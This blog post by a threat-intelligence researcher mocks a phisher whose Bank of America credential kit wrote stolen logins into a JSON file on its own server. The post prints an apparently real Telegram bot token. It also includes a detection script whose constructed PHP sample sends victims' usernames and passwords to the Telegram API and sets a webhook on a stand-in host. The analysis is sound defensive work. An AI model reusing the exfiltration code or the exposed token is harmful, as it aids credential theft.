Have respect for those who study…

Please, don’t call every idiot who commits crimes using a computer a “hacker”. I know I’m harping on about this, but it’s very important to me. The term “hacker” refers to an individual who studies, dedicates himself, and is driven by an indomitable passion. The press, however, decided that this term was appropriate for any idiot who commits a crime using a computer.

Today I bring you a splendid example of an idiot that some will call a “hacker”.

This genius registered a domain (helpvdeskerify247[.]com) to install a kit to steal credentials from Bank of America customers. Matrix discovered the domain and reported it as “opendir.”

The domain was flagged on urlscan some minutes after registration 😉

Since it was clearly suspicious, Matrix continued monitoring. After a few hours Matrix intercepts a change on the site and identifies a cloaker, which it then reports as a possible threat.

A day later, the criminal takes down the site and exposes the kit: Matrix then intercepts, downloads, and analyzes it. It identifies and reports it, highlighting the threat.

Here, the criminal already proves he’s no genius. Analyzing the kit, however, reveals a hidden gem… To collect the stolen credentials, the kit uses a Telegram bot:

7937236406:AAGHUl2hThlX_SuxhkIuxVk2ZhAPoxuW8Ao

Okay, nothing unusual, so what’s strange about it? The genius, instead of leaving the information in the bot’s queue, decides to register a callback. The attack therefore seems a bit more complex than usual. But here’s where the genius shines: the callback is based on the same domain where the kit is located!

So, after traveling around the world, where did the stolen credentials end up? In a damn JSON file on the same machine. 😀 😀 😀
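Added example, not code from the original post or from the kit: a small Python check that pulls out of a kit's source the Telegram bot id, the Bot API methods it calls, and any setWebhook callback URL, and flags when that callback points back at the domain hosting the kit, which is exactly the mistake that left the loot in a JSON file on the same machine. The PHP snippet and the domain phish-kit.example are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Telegram bot tokens have the shape "<numeric bot id>:<35-char secret>".
TOKEN_RE = re.compile(r"\b(\d{8,10}):([A-Za-z0-9_-]{35})\b")
# Any Bot API call: https://api.telegram.org/bot<token>/<method>
API_CALL_RE = re.compile(r"https://api\.telegram\.org/bot[^/\s\"']+/(\w+)")
# setWebhook carries the callback URL in a "url=" parameter on the same line.
WEBHOOK_URL_RE = re.compile(r"setWebhook[^\n]*?url=([^\s&\"']+)")

# Constructed kit fragment; the token and domain are placeholders, not real ones.
SAMPLE_KIT = r'''
<?php
$token = "1234567890:AAFakeTokenForTheExampleOnly_000000";
$msg = "user=" . $_POST["user"] . " pass=" . $_POST["pass"];
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chat&text=" . urlencode($msg));
// callback registered on the kit's own host, so Telegram posts everything back here
file_get_contents("https://api.telegram.org/bot$token/setWebhook?url=https://phish-kit.example/hook.php");
'''


def analyze_kit(source: str, hosting_domain: str) -> dict:
    """Return the Telegram exfiltration indicators found in a kit's source."""
    tokens = [f"{bot_id}:{secret}" for bot_id, secret in TOKEN_RE.findall(source)]
    methods = sorted(set(API_CALL_RE.findall(source)))
    webhooks = WEBHOOK_URL_RE.findall(source)
    # A webhook whose host is the kit's own domain means the stolen data
    # is written back to the compromised/attacker server, not to Telegram.
    self_hosted = [u for u in webhooks if urlparse(u).hostname == hosting_domain.lower()]
    return {
        # Only the numeric bot id is kept; the secret half is not needed for reporting.
        "bot_ids": [t.split(":")[0] for t in tokens],
        "api_methods": methods,
        "webhook_urls": webhooks,
        "callback_on_kit_host": bool(self_hosted),
    }


if __name__ == "__main__":
    print(analyze_kit(SAMPLE_KIT, "phish-kit.example"))
```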

I challenge anyone here to use the term “hacker” to describe this guy!!!

Besides, after two days, GSB and VT continue to ignore this domain. Very well, I’d say.
